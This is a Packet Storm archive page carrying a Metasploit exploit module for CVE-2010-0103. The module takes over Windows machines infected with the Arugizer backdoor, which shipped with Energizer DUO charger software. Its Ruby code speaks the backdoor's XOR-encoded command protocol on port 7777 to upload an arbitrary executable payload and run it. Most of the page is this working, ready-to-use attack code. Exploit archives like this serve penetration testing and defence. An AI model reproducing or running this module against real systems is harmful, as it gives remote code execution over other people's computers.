exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Energizer DUO Trojan Code Execution

Energizer DUO Trojan Code Execution
Posted Mar 9, 2010
Authored by H D Moore | Site metasploit.com

This Metasploit module will execute an arbitrary payload against any system infected with the Arugizer trojan horse. This backdoor was shipped with the software package accompanying the Energizer Duo USB battery charger.

tags | exploit, arbitrary, trojan
advisories | CVE-2010-0103
SHA-256 | a1bf3f27171f32dee29233cb205cbdc4a03991a5c16306ba50e72d267e4f12e0

Energizer DUO Trojan Code Execution

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Energizer DUO Trojan Code Execution',
'Description' => %q{
This module will execute an arbitrary payload against
any system infected with the Arugizer trojan horse. This
backdoor was shipped with the software package accompanying
the Energizer Duo USB battery charger.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 8749 $',
'References' =>
[
['CVE', '2010-0103'],
['URL', 'http://www.kb.cert.org/vuls/id/154421']
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0
))


register_options(
[
Opt::RPORT(7777),
], self.class)
end

def trojan_encode(str)
str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
end

def trojan_command(cmd)
cid = ""

case cmd
when :exec
cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
when :dir
cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
when :write
cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
when :read
cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
when :nop
cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
when :find
cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
when :yes
cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
when :runonce
cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
when :delete
cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
end

trojan_encode(
[cid.length + 1].pack("V") + cid + "\x00"
)
end

def exploit

nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded) + "\x00"


print_status("Trying to upload #{nam}...")
connect

# Write file request
sock.put(trojan_command(:write))
sock.put(trojan_encode([nam.length].pack("V")))
sock.put(trojan_encode(nam))
sock.put(trojan_encode([exe.length].pack("V")))
sock.put(trojan_encode(exe))

# Required to prevent the server from spinning a loop
sock.put(trojan_command(:nop))

disconnect

#
# Execute the payload
#

print_status("Trying to execute #{nam}...")

connect

# Execute file request
sock.put(trojan_command(:exec))
sock.put(trojan_encode([nam.length].pack("V")))
sock.put(trojan_encode(nam))

# Required to prevent the server from spinning a loop
sock.put(trojan_command(:nop))

disconnect
end
end

Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close